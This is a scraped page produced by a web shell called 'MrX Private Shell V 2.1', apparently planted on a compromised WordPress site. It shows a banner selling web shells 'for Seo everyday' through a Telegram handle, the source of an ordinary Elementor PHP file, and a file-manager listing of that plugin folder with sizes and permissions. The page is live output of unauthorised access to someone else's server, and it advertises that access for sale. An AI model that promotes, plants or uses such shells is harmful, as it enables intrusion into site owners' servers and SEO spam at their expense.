__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
namespace Elementor\Core\Utils;
use Elementor\Plugin;
if ( ! defined( 'ABSPATH' ) ) {
exit; // Exit if accessed directly.
}
abstract class Isolation_Manager {
/**
* @param string $adapter_name
*/
public static function get_adapter( string $adapter_name ) {
try {
return Plugin::$instance->elementor_container()
->get( $adapter_name );
} catch ( Exception $e ) {
return null;
}
}
}
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| import-export | Folder | 0750 |
|
|
| promotions | Folder | 0750 |
|
|
| svg | Folder | 0750 |
|
|
| assets-config-provider.php | File | 1.49 KB | 0640 |
|
| assets-translation-loader.php | File | 2.5 KB | 0640 |
|
| collection.php | File | 9.88 KB | 0640 |
|
| exceptions.php | File | 709 B | 0640 |
|
| force-locale.php | File | 3.55 KB | 0640 |
|
| hints.php | File | 10.26 KB | 0640 |
|
| http.php | File | 981 B | 0640 |
|
| isolation-manager.php | File | 415 B | 0640 |
|
| plugins-manager.php | File | 2.84 KB | 0640 |
|
| static-collection.php | File | 1.08 KB | 0640 |
|
| str.php | File | 1001 B | 0640 |
|
| version.php | File | 3.66 KB | 0640 |
|